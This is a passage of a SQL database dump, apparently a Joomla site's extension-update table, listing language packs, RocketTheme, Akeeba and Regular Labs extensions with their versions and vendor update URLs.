CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9918,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9919,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9920,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9921,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9922,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9923,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9924,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9925,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9926,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9927,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9928,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9929,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9930,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9931,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9932,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9933,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9934,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9935,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9936,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9937,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9938,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9939,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9940,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9941,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9942,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9943,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9944,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9945,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9946,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9947,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9948,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9949,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9950,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9951,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9952,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9953,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9954,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9955,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9956,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9957,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9958,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9959,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9960,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9961,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9962,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9963,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9964,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9965,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9966,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9967,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9968,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9969,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9970,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9971,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9972,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9973,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9974,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9975,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9976,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9977,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9978,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9979,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9981,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9982,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9983,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9984,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9985,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9986,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9987,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9988,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9989,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9990,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9991,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9992,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9993,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9994,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9995,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9996,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9997,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9998,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9999,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10000,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10001,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10002,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10003,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10004,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10005,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10006,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10007,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10008,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10009,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10010,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10011,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10012,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10013,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10014,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10015,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10016,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10017,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10018,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10019,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10020,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10021,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10022,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10023,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10024,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10025,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10026,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10027,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10028,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10029,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10030,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10031,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10032,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10033,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10034,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10035,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10036,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10037,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10038,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10039,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10040,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10041,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10042,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10043,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10044,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10045,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10046,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10047,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10048,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10049,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10050,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10051,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10052,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10053,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10054,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10055,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10056,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10057,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10058,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10059,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10060,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10061,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10062,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10063,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10064,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10065,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10066,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10067,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10068,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10069,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10070,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10071,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10072,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10073,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10074,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10075,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10076,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10077,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10078,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10079,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10080,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10081,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10082,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10083,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10084,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10085,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10086,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10087,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10088,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10089,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10090,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10091,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10092,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10093,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10094,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10095,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10096,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(10097,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10098,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10099,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10100,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10101,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10102,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10103,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10104,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10105,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10106,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10107,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10108,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10109,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10110,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10111,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10112,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10113,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10114,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10115,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10116,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10117,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10118,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10119,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10120,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10121,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10122,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10123,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10124,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10125,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10126,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10127,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10128,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10129,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10130,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10131,3,0,'Serbian 